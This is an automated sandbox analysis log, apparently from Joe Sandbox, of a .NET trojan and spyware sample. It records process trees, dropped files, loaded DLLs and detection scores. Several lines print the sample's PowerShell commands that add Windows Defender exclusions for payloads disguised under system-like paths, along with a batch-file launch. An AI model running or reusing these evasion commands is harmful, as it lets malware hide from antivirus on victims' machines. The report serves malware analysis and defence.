                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B8D2A1853_2_00007FFD9B8D2A18
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B880DA053_2_00007FFD9B880DA0
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B896F9853_2_00007FFD9B896F98
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B88F36C53_2_00007FFD9B88F36C
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 53_2_00007FFD9B88CE9D53_2_00007FFD9B88CE9D
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AIflJiPS.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1800732292.000000001B967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718729884.0000000002732000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1717151916.0000000000A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csCryptographic APIs: 'CreateDecryptor'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csCryptographic APIs: 'CreateDecryptor'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csCryptographic APIs: 'CreateDecryptor'
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, AJRTsBVOnfdpTDlf5PX.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@47/91@0/2
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\Desktop\zNoaAjFw.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMutant created: \Sessions\1\BaseNamedObjects\Local\9689fee2575b041d566fe4e90198abfbc11de5c33209f1394c6288edd57e1bda
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile created: C:\Users\user\AppData\Local\Temp\od53iwxzJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 0zDW1acYVi.42.dr, cBi7y8wmkT.42.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeVirustotal: Detection: 60%
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeReversingLabs: Detection: 76%
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile read: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: unknownProcess created: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe "C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe"
                            Source: unknownProcess created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows NT\smartscreen.exe "C:\Program Files (x86)\windows nt\smartscreen.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
